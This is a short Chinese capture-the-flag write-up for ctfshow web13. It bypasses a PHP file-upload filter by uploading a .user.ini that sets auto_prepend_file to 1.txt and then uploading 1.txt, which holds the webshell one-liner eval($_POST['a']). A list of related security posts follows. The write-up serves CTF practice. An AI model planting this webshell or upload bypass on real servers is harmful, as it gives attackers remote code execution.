ctfshow-web13 文件上传

0x00 前言

0x01 题目

0x02 Write Up

首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件

可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:php user.ini详解

那么我们先上传.user.ini

cpp 复制代码
auto_prepend_file=1.txt

然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量

cpp 复制代码
<?php eval($_POST['a']);

上传好了之后,通过index.php进行访问

首先查看当前目录

然后通过highlight_file读取文件

以上

相关推荐
能年玲奈喝榴莲牛奶6 分钟前
网络安全服务-网络安全检查
安全·web安全·网络安全·安全服务
钟智强15 分钟前
国内环境Ollama安装与DeepSeek-R1:1.5b部署全攻略
安全·web安全·网络安全·ollama·deepseek
Bruce_Liuxiaowei2 小时前
2026年4月第4周网络安全形势周报
安全·web安全·ai
胡志辉的博客2 小时前
前端反调试:常见套路、识别方法与绕过思路
前端·javascript·web安全·状态模式·安全威胁分析·代码混淆
Chengbei113 小时前
FOFA高级会员、DayDaymap、360Quake、Hunter测绘搜索引擎高级会员免费使用最大1W条查询
网络·安全·web安全·搜索引擎·网络安全·金融·系统安全
IT菜鸟程20 小时前
网络安全实战nginx漏洞版本升级 1.28.0到1.30.0
安全·web安全
运维行者_21 小时前
通过OpManager的Windows服务监控能力释放最佳IT网络性能
服务器·开发语言·网络·windows·web安全·php
你觉得脆皮鸡好吃吗1 天前
SQL注入 手工注入
网络·数据库·sql·安全·web安全·网络安全学习
一名优秀的码农1 天前
vulhub系列-83-Grotesque:1.0.1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
сокол1 天前
【网安-Web渗透测试-Linux提权】SUID提权
linux·前端·web安全·网络安全